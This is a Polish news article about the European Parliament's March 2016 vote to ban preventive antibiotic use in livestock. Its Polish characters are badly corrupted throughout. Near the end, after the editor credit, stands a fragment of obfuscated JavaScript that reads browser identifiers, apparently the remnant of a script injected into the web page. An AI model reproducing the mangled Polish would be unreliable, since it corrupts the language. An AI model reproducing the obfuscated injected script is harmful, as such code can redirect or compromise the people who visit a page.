Parlament Europejski zakazuje antybiotykowych dziaA�aA� profilaktycznych dla zwierzA�t

0
23
Źródło: Pickup Image Licencja: CCO


Parlament Europejski opowiedziaA� siA� 10 marca 2016 roku za zakazem prewencyjnego leczenia zwierzA�t antybiotykami. EuroposA�owie poparli wspieranie badaA� nad nowymi metodami leczenia w weterynarii.

ZwierzA�ta zarA?wno jak i ludzie sA� naraA?eni na choroby i ataki mikrobA?w. Do walki z tymi wirusami stosujemy antybiotyki, ktA?rych iloA�A� jest ograniczona. Przy bezzasadnym ich wykorzystaniu oraz przy nieprawidA�owym postA�powaniu wedA�ug instrukcji mikroby uodporniA� siA� na ich dziaA�anie. Skutkiem tego moA?e byA� A�mierA� zwierzA�cia, ale zagroA?one jest rA?wnieA? A?ycie czA�owieka, jedzA�cego jegoA�miA�so.

W hodowlach przemysA�owych antybiotyki stosowane sA� nie tylko w celu zwalczania chorA?b, ale rA?wnieA? w profilaktyce oraz stymulacji wzrostu zwierzA�cia. Takie dziaA�anie jest zdecydowanie taA�sze, a rezultat jest widocznie szybszy.

Jak podaje portal ekologia.pl Unia Europejska chce ukrA?ciA� ten proceder. Przedstawiony we wrzeA�niu 2014 roku projekt autorstwa KE ma na celu reorganizacjA� unijnych przepisA?w odnoszA�cych siA� do weterynaryjnych produktA?w leczniczych (VMP), w tym m.in. dostA�pnoA�ci do antybiotykA?w w celu stymulacji organizmu zwierzA�t.

W czwartek 10 marca 2016 roku w Strasburgu nad projektem gA�osowali eurodeputowani. Poparli oni zakaz prewencyjnego stosowania antybiotykA?w w rolnictwie oraz koniecznoA�A� wspomagania badaA� nad nowymi lekami.

Zdaniem francuskiej posA�anki Francoise Grossetete odpowiedzialnej za przygotowanie sprawozdania w tej sprawie, konieczne jest wyeliminowanie tego problemu u korzeniA�i walka z odpornoA�ciA� na antybiotyki musi rozpoczA�A� siA� w gospodarstwach rolnych.

PosA�owie chcA�, A?eby korzystanie z antybiotykA?w byA�o poprzedzone decyzjA� weterynarza. Ponadto jest zakazane ich wykorzystanie jako A�rodkA?w profilaktycznych. Dodatkowo w celu zwalczania „antybiotykoodpornoA�ci” Komisja Europejska miaA�aby prawo doA�przygotowania listy lekA?w przeznaczonych wyA�A�cznie dla ludzi i oddzielenia ich od lekA?w przeznaczonych dla zwierzA�t.

Zdaniem autorA?w projektu, wpA�ynie to korzystnie na pracA� weterynarzy, bo Unia bA�dzie wspieraA�a ich badania nad tworzeniemA�nowych lekA?w. Nie chcemy ograniczaA� moA?liwoA�ci weterynarzy ani ograniczaA� im dostA�pu do arsenaA�u medycznego.

To rozporzA�dzenie ma im raczej uA�atwiA� pracA� – mA?wiA�a w Strasburgu Grossetete.

Redaktor prowadzA�cy: Oleksii Abramov

x2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

BRAK KOMENTARZY

ZOSTAW ODPOWIEDŹ